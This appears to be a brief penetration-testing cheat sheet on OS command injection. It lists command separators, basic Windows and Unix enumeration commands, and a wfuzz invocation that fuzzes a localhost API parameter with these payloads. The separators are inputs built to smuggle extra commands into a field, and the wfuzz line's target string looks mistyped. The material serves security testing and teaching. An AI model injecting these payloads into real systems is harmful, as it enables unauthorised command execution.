Operating System Command Inejction
It really helps to know which operating system is running on the target server. Make sure to get the most out of Nmap scans during reconnaissance stage.
Look for parameters under your control as usual: URL query strings, request parameters, headers, any request that has thrown unique or verbose errors (especially ones containing any operating system information). Command separators:
|
||
&
&&
'
"
;
'"
Fuzzing with 2 positions: for command separator and potential operating system commands.
Windows:
ipconfig
dir
ver // prints the operating system and version
echo %CD% // prints teh current working directory
whoami
\*nix (Linux and Unix):
ifconfig
ls
uname -a
pwd
whoami
With Wfuzz:
`wfuzz -z file,/home/shiuser/Tools/wordlists/SecLists/Fuzzing/OSCi/command_sep.txt -z file,/home/shiuser/Tools/wordlists/SecLists/Fuzzing/OSCi/os_cmds.txt http://localhost:8888/api/users/query?=WFUZZWFUZ2Z`